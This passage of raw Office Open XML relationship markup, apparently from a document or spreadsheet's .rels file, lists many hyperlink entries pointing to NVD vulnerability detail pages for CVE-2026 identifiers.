Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 